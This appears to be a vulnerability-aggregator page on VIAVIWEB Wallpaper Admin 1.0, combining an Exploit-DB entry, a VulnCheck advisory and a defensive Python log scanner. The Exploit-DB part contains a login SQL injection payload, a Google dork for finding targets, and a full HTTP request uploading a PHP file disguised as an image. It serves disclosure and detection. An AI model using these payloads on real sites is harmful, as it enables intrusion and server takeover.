# VIAVIWEB 1.0 SQL Injection Vulnerability
N/A
Web-class vulnerability: Unknown
Rationale:
| # | POC description | Source link | Shenlong link |
|---|---|---|---|
Title: VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities - PHP webapps Exploit -- 🔗 Source link
Tags: exploit
Shenlong quick read:
## Key Vulnerability Information
- **EDB-ID:** 51033
- **CVE:** N/A
- **Author:** EDD13MORA
- **Type:** WEBAPPS
- **Platform:** PHP
- **Date:** 2023-03-22
- **Vulnerable App:** VIAVIWEB Wallpaper Admin 1.0
## Vulnerability Details
- **Exploit Title:** VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
- **Google Dork:** intext:"Wallpaper Admin" "LOGIN" "password" "Username"
- **Date:** 18/09/2022
- **Exploit Author:** Edd13Mora
- **Vendor Homepage:** www.viaviweb.com
- **Version:** N/A
- **Tested on:** Windows 11 - Kali Linux
### Vulnerability Description
- **SQL Injection on the Login Page**
- `payload --> admin' or 1=1-- -`
### Proof of Concept (POC)
```http
POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2
Host: http://googlezik.freehostia.com
Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jd8oraed4o52
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=--------------------------33893919268150571572221367848
Content-Length: 467
Origin: http://googlezik.freehostia.com
Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

--------------------------33893919268150571572221367848
Content-Disposition: form-data; name="category_id"

1
--------------------------33893919268150571572221367848
Content-Disposition: form-data; name="image[]"; filename="poc.php"
Content-Type: image/png

<?php phpinfo(); ?>
--------------------------33893919268150571572221367848
Content-Disposition: form-data; name="submit"

--------------------------33893919268150571572221367848--
```
### Uploaded File Location
- `http://localhost/PAth-Where-Script-Installed/categories/`
Title: VIAVIWEB Wallpaper Admin 1.0 SQL Injection via edit_gallery_image.php | Advisories | VulnCheck -- 🔗 Source link
Tags: third-party-advisory
Shenlong quick read:
**VIAVIWEB Wallpaper Admin 1.0 SQL Injection via edit_gallery_image.php**
- **Severity:** HIGH
- **Date:** January 13, 2026
- **Affecting:**
  - VIAVIWEB Wallpaper Admin 1.0
**References:**
- ExploitDB-51033
- Vendor Homepage
**Description:**
VIAVIWEB Wallpaper Admin 1.0 contains an SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the img_id parameter. Attackers can send GET requests to edit_gallery_image.php with malicious img_id values to extract database information.
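A detection sketch for the `img_id` injection described above, added here as an example (it is not code from the advisory or the vendor): it scans web access log lines for requests to `edit_gallery_image.php` whose `img_id` is not a plain integer. The log lines are constructed, and treating legitimate `img_id` values as short decimal integers is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
TARGET_SCRIPT = "edit_gallery_image.php"   # script named in the advisory
PARAM = "img_id"                           # parameter named in the advisory
# Assumption: a legitimate img_id is a short decimal integer.
VALID_ID = re.compile(r"[0-9]{1,10}")

def suspicious_img_id(line):
    """Return the decoded img_id values that are not plain integers, or []."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/" + TARGET_SCRIPT):
        return []
    # parse_qs percent-decodes values; keep_blank_values so "img_id=" is seen.
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM, [])
    return [v for v in values if not VALID_ID.fullmatch(v)]

def scan(lines):
    """Yield (client_ip, bad_values) for every flagged log line."""
    for line in lines:
        bad = suspicious_img_id(line)
        if bad:
            yield line.split(" ", 1)[0], bad

# Constructed sample log lines (not taken from any real system).
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Jan/2026:10:00:01 +0000] "GET /hd_wallpaper/edit_gallery_image.php?img_id=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [13/Jan/2026:10:00:05 +0000] "GET /hd_wallpaper/edit_gallery_image.php?img_id=12%27%20or%201%3D1--%20- HTTP/1.1" 200 9876',
    '198.51.100.9 - - [13/Jan/2026:10:00:09 +0000] "GET /hd_wallpaper/edit_gallery_image.php?img_id=3&img_id=3%27 HTTP/1.1" 200 9876',
    '203.0.113.4 - - [13/Jan/2026:10:00:11 +0000] "GET /hd_wallpaper/index.php?img_id=x HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for ip, bad in scan(SAMPLE_LOG):
        print(ip, bad)
```

Flagging non-integer values only surfaces probing; the remediation is to bind `img_id` as an integer parameter in the query itself.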